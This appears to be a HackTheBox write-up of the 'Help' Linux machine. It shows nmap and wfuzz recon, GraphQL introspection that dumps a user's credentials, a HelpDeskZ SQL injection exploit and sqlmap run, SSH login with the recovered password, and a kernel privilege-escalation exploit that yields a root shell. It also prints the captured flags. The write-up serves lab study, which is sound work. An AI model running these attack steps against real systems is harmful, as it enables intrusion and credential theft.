# Help Help is an easy-rated Linux machine from [HackTheBox ](https://app.hackthebox.com/machines/170)created by cymtrick. In the current post, my IP is 10.10.14.23, and the target’s IP is 10.129.227.176 I assume that the machine is pretty random, with the version obtainable only by a "readme", that you know about it existence from git... the url vulnerable to sqli is really hidden, I didn't like this maachine at all. ## Recon {% code title="Local Terminal" %} ```bash nmap -p- --open -sS --min-rate 5000 10.129.227.176 -vvv -n Nmap scan report for 10.129.227.176 Host is up, received reset ttl 128 (0.0027s latency). Scanned at 2023-07-09 02:51:15 UTC for 40s Not shown: 63200 filtered tcp ports (no-response), 2333 closed tcp ports (reset) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 128 80/tcp open http syn-ack ttl 128 3000/tcp open ppp syn-ack ttl 128 Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 39.72 seconds Raw packets sent: 196635 (8.652MB) | Rcvd: 40142 (1.606MB) ``` {% endcode %} {% code title="Local Terminal" %} ```bash nmap -sCV -p 22,80 10.129.227.176 -oN Target Nmap scan report for 10.129.227.176 Host is up (0.021s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA) | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA) |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` {% endcode %}

whatweb help.htb

http://help.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.227.176], 
Title[Apache2 Ubuntu Default Page: It works]

* Browser: At this point we have nothing, it just a web site with the default index, from this point the best option is to FUZZ the target. {% code title="Local Terminal" %} ```bash wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt help.htb/FUZZ ``` {% endcode %} ```bash ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://help.htb/FUZZ Total requests: 220546 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000041: 301 9 L 28 W 306 Ch "support" 000001059: 301 9 L 28 W 309 Ch "javascript" ``` "Support" and "JavaScript", virtually there is nothing, let's explore another port > > > We don't have any credentials or tools to use here... ### Port 3000 >

All right, this looks like a taunt, let's extract more information {% code title="Local Terminal" %} ```bash $ curl -v http://help.htb:3000/ * Trying 10.129.227.176:3000... * Connected to help.htb (10.129.227.176) port 3000 (#0) > GET / HTTP/1.1 > Host: help.htb:3000 > User-Agent: curl/7.88.1 > Accept: */* > < HTTP/1.1 200 OK < X-Powered-By: Express < Content-Type: application/json; charset=utf-8 < Content-Length: 81 < ETag: W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU" < Date: Sun, 09 Jul 2023 15:23:28 GMT < Connection: keep-alive < * Connection #0 to host help.htb left intact {"message":"Hi Shiv, To get access please find the credentials with given query"} ``` {% endcode %} Nothing from curl, maybe we should fuzz it with a[ wordlist specific for API.](https://gist.github.com/helcaraxeals/7c45201b1c957ecea82ef7800da4bfa4) {% code title="Local Terminal" %} ```bash wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/api.txt help.htb:3000FUZZ ``` {% endcode %} ```bash ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://help.htb:3000FUZZ/ Total requests: 584 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000215: 400 0 L 3 W 18 Ch "/graphql" 000000216: 400 0 L 3 W 18 Ch "/graphql/console" Total time: 0 Processed Requests: 562 Filtered Requests: 560 Requests/sec.: 0 ``` So, there is a GraphQL running at the API, now we have to work with specific exploits. {% embed url="" %} {% code title="Local Terminal" %} ```bash └─# curl -s http://help.htb:3000/graphql GET query missing. ``` {% endcode %} Usually Graphql is exploitable with POST, so intercept with **Burpsuite**, change the request method, add the line "Content-Type: application/json" and apply the first suggested payload

It works, and you can do the same with **Curl** {% code title="Local Terminal" %} ```bash curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c . ``` {% endcode %} ```jq {"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}} ```

We know that there is a "User" around, so we want now to dump it. {% code title="Local Terminal" %} ```bash curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq . ``` {% endcode %} ```jq { "data": { "__type": { "name": "User", "fields": [ { "name": "username" }, { "name": "password" } ] } } } ``` {% code title="Local Terminal" %} ```bash curl -s http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq . ``` {% endcode %} ```jq { "data": { "user": { "username": "helpme@helpme.com", "password": "5d3c93182bb20f07b994a7f617e99cff" } } } ``` And we found an email and a password, this should work for at other website, but first we need to thecrypt the password. {% embed url="" %}

* [http://help.htb/support/](http://help.htb/support/?v=login)

## Exploitation ### Reverse Shell (Help) After exploring the website and testing the ticket system, I found nothing... let's just search about "HelpDeskZ Github" {% embed url="" %} There is something about a "readme.html" {% endembed %} >

{% code title="Local Terminal" %} ```bash searchsploit HelpDeskZ -------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------- --------------------------------- HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py -------------------------------------------------------------------------------------------------------------------- --------------------------------- ``` {% endcode %} {% code title="Local Terminal" %} ```bash searchsploit -m 41200.py ``` {% endcode %} Edit the python script and add at the first line: `#-- coding: utf-8 --` And at line 94, change to `session = requests.session()` {% code title="Local Terminal" %} ```bash python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz ------------------------------------------ username: password: sha256() Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_ try to submit ticket with attachment ``` {% endcode %} Ok, we need to submit another ticket with a file, and then execute the exploit again and wait. At the end, it does not work, but at least now we know the URL where the injection happens. > Intercept the downloading process of a file, and save the request (saved as **request**).

Now execute sqlmap to extract the password. {% code title="Local Terminal" %} ```bash sqlmap -r request --level 5 --risk 3 -p param[] ``` {% endcode %} We have the hash, slq1, after decrypt the password is { Welcome1 }, login through ssh to the machine. {% code title="Local Terminal" %} ```bash python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz ------------------------------------------ username: password: sha256() Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_ try to submit ticket with attachment ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ ssh -l help 10.129.227.176 # Password: Welcome1 $ cat user.txt 4dbb347ce71e1f06251894265c3bdb90 ``` {% endcode %} ### Privileges Escalation We have the first flag, now we do some basic test for escalation {% code title="Target Terminal \[help]" %} ```bash help@help:~$ id uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare) help@help:~$ sudo -l [sudo] password for help: Sorry, user help may not run sudo on help. help@help:~$ cd / help@help:/$ find / -perm -4000 2>/dev/null /usr/sbin/exim4 /usr/bin/sudo /usr/bin/chfn /usr/bin/vmware-user-suid-wrapper /usr/bin/chsh /usr/bin/gpasswd /usr/bin/newgrp <...> help@help:~$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.5 LTS Release: 16.04 Codename: xenial help@help:/$ uname -a Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux ``` {% endcode %} We found an unusually old version at "**uname -a**", after searching for "Linux Kernel 4.4.0-116" at exploitDB we found something. Copy the script as "exploit.c" at tmp (paste using nano), and then compile with the command `gcc -o attack exploit.c` {% embed url="" %} {% code title="Target Terminal \[root]" %} ```bash help@help:/tmp$ ./attack task_struct = ffff88003ba2aa80 uidptr = ffff88003ab0e184 spawning root shell root@help:/tmp# cat /root/root.txt 62106a044573c82858c99023794af117 ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/help.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.